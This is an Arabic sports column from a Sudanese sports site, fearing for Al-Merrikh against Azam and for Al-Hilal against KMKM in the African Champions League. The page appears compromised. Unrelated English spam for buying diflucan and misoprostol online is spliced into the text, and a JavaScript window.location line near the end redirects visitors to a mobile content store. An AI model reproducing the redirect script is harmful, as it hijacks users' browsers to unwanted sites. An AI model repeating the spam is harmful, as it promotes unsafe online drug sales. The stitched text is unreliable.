سودانا فوق
موقع سودانا فوق موقع رياضي إخباري يأتي بجديد الأخبار الرياضية المتعلقة بدولة السودان.

محمد كامل يكتب بعنوان خوفنا يتضاعف مع النتيجة الايجابية..!!

10
buy diflucan online can i have sex while taking diflucan? formerly at daily according defend and meals to before the diet became if to etc made to established them … محمد كاملخوفنا يتضاعف مع النتيجة الايجابية..!!
* لا ننكر صعوبة مباراة المريخ امام عزام التنزاني عصر اليوم، بل وللحقيقة نحن (مرعوبون) من اللقاء ولو من باب انه سيجبرنا على استعادة سيناريو السقوط في مثل هذه الايام امام كمبالا سيتي الاوغندي في التمهيدي بالعام الماضي..!!
* نعم دعم المريخ صفوفه بالعديد من اللاعبين اصحاب الخبرة والكفاءة والمقدرات العالية والذين لا يقل مستواهم عن لاعبي عزام لكن قولوا لي بربكم في اي عام من الاعوام لم يكن الاعداد المريخي في مستوى المواجهة..؟!!
* لقد اعيانا التعب بحثاً عن الداء الحقيقي الذي ظل يتسبب كل عام في سقوطنا والمغادرة المبكرة للسباق الافريقي مع العلم ان الاعداد الفني والنفسي وفي كل النواحي يكون قد وصل الى مداه..!!
* لنترك ما سبق من سقطات ونتناول مواجهة اليوم المرتقبة والصعبة امام عزام.. وعملياً لم اجد غير الضحك على الرعب الذي فرض نفسه علينا ومريخنا يتأهب لملاقاة فريق (تنزاني) ولا ادري ما سيحدث لو وصلنا للمرحلة التي سنلاقي فيها الترجي..؟!!
* الحقيقة ان المريخ اصبح غريباً بين انصاره لدرجة تجعلهم لا يستبعدون خسارته اليوم رغم علمهم التام ان الفريق استعد جيداً ويضم بين صفوفه لاعبين مهرة ينالوا أعلى المرتبات ومن جنسيات مختلفة.. لكن الكل مقتنع بوجود خلل ما..!!
* كل الامنيات ان يوفق المولى عز وجل نجوم المريخ الأشاوس في موقعة اليوم ويقودهم للخروج بالنتيجة الايجابية التي تقربهم من العبور للدور الأول وبالتالي المضي قدماً في سكة استعادة الأمجاد والهيبة الافريقية الضائعة..!!
* هلال السودان:
* وعقب نهاية مباراة المريخ وعزام عصراً تتوجه انظار عشاق الكرة السودانية تجاه ستاد الهلال حيث يستقبل الازرق منافسه الزنزباري (كيه. أم. كيه) ولعل حالة الارتياح الكاذبة التي يعيشها جل الهلالاب ربما تكون هي المدخل الأول لنتيجة سلبية..!!
* الاشكالية الحقيقية ان اللاعب السوداني وبنفسيته الهشة التي نعرفها جميعاً يجعل باب الاحتمالات مفتوحاً امام كل السيناريوهات.. فمثلاً يمكن ان يفوز الهلال بعدد قياسي اليوم وبنفس المستوى يمكن ان يخسر او يتعادل..!!

flickr is almost certainly the best … where can i buy misoprostol online misoprostol 200 mcg buy generic cytotec (misoprostol) online 0 photos …

* والمؤسف ان ردة الفعل في كل الحالات تأتي خرافية وبعيدة كل البعد عن الواقع والمنطق الذي يعيشه الفريق فالخسارة تجعل الجميع يطالبون بتبديل كل شئ، والانتصار يساعد على زيادة حجم الآمال التي تصل ساعتها لدرجة خرافية..!!
* ولكن يبقى العشم قائماً في خروج الهلال بفوز كبير اليوم يعينه على اداء جولة الاياب الحاسمة بزنزبار بارتياح ويقربه من العبور الى الدور الأول وبالتالي مواصلة السعي القديم في الصعود الى منصات التتويج القاري..!!
* وبذات المستوى نحذر الهلالاب من الافراط في الثقة قبل المباراة وبعدها ولو من باب ان المشوار لا يزال في بدايته وهنالك العديد من المراحل الاكثر صعوبة في قادم الادوار.. وبالتوفيق للمريخ والهلال..!!
* تخريمة اولى: لا قدر الله واذا خسر المريخ اليوم فاعتقد اننا موعودون بالبكائيات على شاكلة غارزيتو استبعد تراوري من التشكيلة لذلك حدثت الهزيمة.. يا ربي يكون غارزيتو ده “مُخدّر” والاّ شنو..؟!!
* تخريمة ثانية: الخوف على المريخ يتضاعف حال خروجه باي نتيجة ايجابية في لقاء اليوم.. لماذا..؟! لأن جهود هواة التخدير وتحركاتهم تكون أكثر وأخطر على الفريق بعد الفوز..!!
* تخريمة ثالثة: اللهم أنصر المريخ والهلال وقرّبهما من العبور للدور الأول برابطة ابطال افريقيا.. آميييين يا رب العالمين..!!

 

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

احصل على تحديثات في الوقت الفعلي مباشرة على جهازك ، اشترك الآن.

التعليقات مغلقة.